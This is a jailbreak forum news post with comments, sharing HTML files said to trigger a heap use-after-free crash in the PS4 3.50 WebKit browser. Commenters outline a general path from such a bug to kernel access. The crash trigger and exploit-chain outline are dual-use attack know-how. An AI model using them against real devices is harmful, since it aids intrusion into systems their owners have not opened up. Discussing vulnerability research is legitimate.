Category: PS4 Jailbreaking | Thread starter: PSXHAX | Start date: May 21, 2016 at 3:38 PM
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say, to quote: Hello. Appears this needs to be posted public... Not sure who felt the need to want fame for this, cough "Qwerty", but that's the last time I am sharing something special like this.

Anyone hoping for advancements in the PS Vita scene, you can blame this guy for why, because I am no longer sharing anything.

Anywho, make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
        document.writeln('<html></html>');
      }
    </script>
    <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause an out-of-memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
[Image: PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg]

Comments

PSXHAX

Thanks @proskopina :D

We couldn't do it without all those helping with news in the Shoutbox though... what I normally do is check the Shoutbox from my phone throughout the day, and if there is news then I hop on the PC to post it. :cool:
mcmrc1

I think it is in this direction ->

Find a vuln -> If found, like the memory error -> Check if the vuln is exploitable -> If so, it's a good sign -> Next step, use an exploit for the vuln as an entry point -> entry point OK -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have kernel access, but another exploit is needed to gain root or run own code....

Just my thinking, it can be wrong; maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is OK....^^